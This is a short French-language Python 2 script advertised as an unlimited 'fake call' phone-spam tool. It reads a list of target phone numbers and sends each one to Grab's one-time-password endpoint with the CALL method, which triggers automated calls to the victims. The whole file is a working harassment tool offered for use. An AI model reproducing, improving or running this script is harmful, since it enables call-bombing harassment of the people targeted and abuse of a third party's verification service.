#!/usr/bin/python2
#coding=utf-8
#Dev: Faxel

# Le credit pour ce code va a Mr Faxel
# Si vous voulez prendre Le credit pour ce code Voyez Faster Axel.


import base64
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,mechanize,fileinput
from time import sleep
os.system("clear")
try:
	import requests
except:
	os.system("pip2 install requests;pip install requests")
print("""	      [ Appel fake python 
	      [ Type de spam : telepone
	      [ Illimité     : oui
	      [ Auteur       : Faxel
""")
numero = raw_input("\tEntrer le numero de votre cible : ")
try:
	Lancement = open(numero).readlines()
except:
	print("N'a pas pu joindre: ",numero,"veuillez ressayez")
	exit()
for x in Lancement:
	numeros =x.replace("08","225").replace("\n","")
	requete= requests.post("https://api.grab.com/grabid/v1/phone/otp",data={"method":"CALL","countryCode":"id","phoneNumber":numeros,"templateID":"pax_android_production"}).text
	if requete !="errors":
		print(" Appel fake reussie vers    : "+str(numeros))
	else:
		print(" Echec de l'appel fake vers : "+str(numeros))
print("A plus Mec, N'oublie de t abonner a ma chaine youtube.")
